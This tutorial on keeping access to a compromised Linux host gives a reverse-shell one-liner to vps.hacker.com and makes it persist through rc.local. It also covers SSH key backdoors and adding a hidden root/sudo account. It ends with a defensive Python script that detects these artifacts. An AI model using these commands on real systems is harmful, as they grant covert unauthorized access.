In this article we describe some post-exploitation techniques that allow us to maintain access to a Linux box.
Reverse shell
A reverse shell is neither discreet nor elegant, but it allows quick backdoor access to the box.
Moreover, it does not require the machine to be reachable from the Internet, which is useful when it sits behind NAT or a firewall.
Launch a connection to the attack server from our compromised machine:
    root@compromised$ /bin/sh -c "while [ 1 ];do rm /tmp/f;mkfifo /tmp/f;/bin/bash < /tmp/f 2>&1 |nc vps.hacker.com 8080 > /tmp/f;sleep 10;done"
This one-liner will try to open a shell to vps.hacker.com:8080 every 10 seconds.
We need a listener on the attacking server:
    root@vps.hacker.com$ nc -lvp 8080
After some time, the shell connects back to the listener:
    root@vps.hacker.com$ nc -lvp 8080
    listening on [any] 8080 ...
    connect to [10.0.0.1] from root@compromised [10.0.0.2] 24021
    id
    uid=0(root) gid=0(root) groups=0(root)
We can then put the reverse shell one-liner in rc.local or .bashrc so that it survives a reboot.
    root@compromised$ echo '(/bin/bash -c "while [ 1 ];do rm /tmp/ncfifo;mkfifo /tmp/ncfifo;/bin/bash < /tmp/ncfifo 2>&1 |nc vps.hacker.com 8080 > /tmp/ncfifo;sleep 10;done")&' >> /etc/rc.local
SSH backdoor
If an SSH service is running on the compromised host, a simple option is to add our public key to its authorized_keys file. We can then connect directly over SSH.
First, generate an SSH keypair on our attacking server and print the public half:
    root@vps.hacker.com$ ssh-keygen
    root@vps.hacker.com$ cat ~/.ssh/id_rsa.pub
    ssh-rsa AAAAB3N[...]Zf
Then we append the public key to the authorized_keys file on the compromised host:
    root@compromised$ echo 'ssh-rsa AAAAB3N[...]Zf' >> ~/.ssh/authorized_keys
We can log in anytime with:
Add user
Another option is to add a user. We can then use this account to log in through SSH, FTP or any other service that authenticates against local accounts on the machine.
    root@compromised$ useradd admin --password $(echo lemmein|mkpasswd -s) --groups root,sudo
This adds an “admin” user with password “lemmein”.
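Each of the three techniques above leaves an artifact that a host audit can pick up: a netcat/FIFO loop in a startup file, an unrecognised key in authorized_keys, and an extra account with UID 0 or root/sudo membership. The following Python script is an added defensive example, not part of the original article; it runs those checks over constructed copies of /etc/rc.local, authorized_keys, /etc/passwd and /etc/group that mirror the commands shown above.

```python
import re

# Constructed stand-ins for /etc/rc.local, ~/.ssh/authorized_keys, /etc/passwd and
# /etc/group on a host where the three techniques above have all been applied.
RC_LOCAL = """#!/bin/sh -e
(/bin/bash -c "while [ 1 ];do rm /tmp/ncfifo;mkfifo /tmp/ncfifo;/bin/bash < /tmp/ncfifo 2>&1 |nc vps.hacker.com 8080 > /tmp/ncfifo;sleep 10;done")&
exit 0
"""
AUTHORIZED_KEYS = "ssh-rsa AAAAB3N[...]Zf\nssh-ed25519 AAAAC3N[...]Qk ops@backup\n"
PASSWD = "root:x:0:0:root:/root:/bin/bash\nadmin:x:1001:1001::/home/admin:/bin/sh\n"
GROUP = "root:x:0:admin\nsudo:x:27:admin\nusers:x:100:\n"

# Netcat reverse shells pair an nc/ncat/netcat call with a FIFO, /dev/tcp or a piped shell.
NC_RE = re.compile(r"\b(nc|ncat|netcat)\b")
SHELL_RE = re.compile(r"mkfifo|/dev/tcp/|/bin/(ba)?sh\b")

def find_reverse_shells(text):
    """Line numbers in a startup file whose content matches a netcat reverse-shell pattern."""
    return [n for n, line in enumerate(text.splitlines(), 1)
            if NC_RE.search(line) and SHELL_RE.search(line)]

def unknown_authorized_keys(text, known_blobs):
    """authorized_keys entries whose key blob is not in the allowlist of known keys."""
    found = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and not line.startswith("#") and parts[1] not in known_blobs:
            found.append(line)
    return found

def privileged_accounts(passwd, group, expected=("root",)):
    """Accounts with UID 0 or root/sudo/wheel membership that are not on the expected list."""
    flagged = set()
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0":
            flagged.add(f[0])
    for line in group.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[0] in ("root", "sudo", "wheel") and f[3]:
            flagged.update(f[3].split(","))
    return sorted(flagged - set(expected))

if __name__ == "__main__":
    print("reverse shell lines in rc.local:", find_reverse_shells(RC_LOCAL))
    print("unknown SSH keys:", unknown_authorized_keys(AUTHORIZED_KEYS, {"AAAAC3N[...]Qk"}))
    print("unexpected privileged accounts:", privileged_accounts(PASSWD, GROUP))
```

On a real host, feed the functions the contents of the actual files (and also ~/.bashrc, /etc/profile.d and cron entries, which the same loop could be planted in) and keep the key allowlist under change control so that a newly appended key stands out.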